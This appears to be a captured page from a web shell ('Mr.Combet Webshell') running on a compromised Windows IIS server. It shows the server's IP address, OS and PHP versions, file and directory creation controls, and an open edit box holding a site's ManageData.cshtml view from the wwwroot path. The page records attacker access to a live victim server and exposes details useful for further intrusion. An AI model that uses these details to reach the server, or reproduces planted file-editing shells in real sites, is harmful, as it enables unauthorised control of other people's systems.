Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
HRDC
/
HRDC
/
Views
/
Dashboard
/
Edit File Name :
ManageData.cshtml
@{ ViewBag.Title = "Create"; Layout = "~/Views/Shared/_AdminLayout.cshtml"; } @using (Html.BeginForm("SaveXML", "Dashboard", FormMethod.Post, new { enctype = "multipart/form-data" })) { @Html.AntiForgeryToken() @Html.ValidationSummary(true, "", new { @class = "text-danger" }) <div class="row"> <div class="col-xs-12"> <div class="panel panel-primary"> <div class="panel-heading"> Manage XML Data </div> <div class="panel-body"> <div class="form-group"> <input type="file" name="file" class="form-control" /> <input type="submit" name="Submit" id="Submit" value="Upload data file" class="btn btn-primary" /> </div> <div class="form-group"> <b>download data file</b> <a href="~/Dashboard/FileDownload?file=xmldata.xml" )" class="fa fa-download"></a> </div> </div> </div> </div> </div> }
Save